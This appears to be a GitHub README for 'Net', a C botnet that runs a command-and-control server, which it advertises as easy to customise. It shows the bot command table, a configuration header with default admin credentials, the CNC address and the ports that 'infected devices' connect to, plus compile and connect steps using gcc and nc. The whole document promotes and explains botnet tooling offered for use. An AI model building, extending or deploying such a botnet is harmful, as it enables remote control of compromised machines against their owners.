You signed in with another tab or window.Reload to refresh your session.You signed out in another tab or window.Reload to refresh your session.You switched accounts on another tab or window.Reload to refresh your session.Dismiss alert
Net is a very easy-to-use botnet that has several options while being highly customizable.
Features
Feature
Description
Multi-threading
The server works in the background while the CLI is running.
Sending data
You can send data to all the connected devices.
Clean interface
Net has an easy-to-use clean CLI that is easy to navigate.
Dynamic Commands
Net makes it very easy for you to add your own commands.
Dynamic Commands & Custom Commands
To add commands, simply create your function and then add the custom command and function tobotnet_commands as shown below.
structfunctionbotnet_commands[]= { {"custom_command",custom_function},// <- The custom command goes right here! Make sure you have already written your function! {"?",help_menu}, {"help",help_menu}, {"bots",bot_count}, {"list",bot_count}, {"server",cnc_details}, {"banner",display_banner}, {"clear",clear_screen}, {"cls",clear_screen},};
Configuration
To edit the configuration for the botnet, head over toincludes/config/config.h.
#pragma once/* * includes/config/config.h * Date: 11/09/21 * Author: 0x1CA3*/#defineUSERNAME "admin"#definePASSWORD "password"#defineMAX_DEVICES 99999#defineCNC_IP "127.0.0.1"#defineCNC_PORT 1337/* This is the port your bots/infected devices will use to connect */#defineADMIN_PORT 1233/* This is the port you will use when connecting to the admin panel */
Installation & Setup
gcc -o net net.c -lpthread./netOpen up a new terminal windowConnect to the CnC | Example: nc 127.0.0.1 3434Login with the default credentials [admin:password]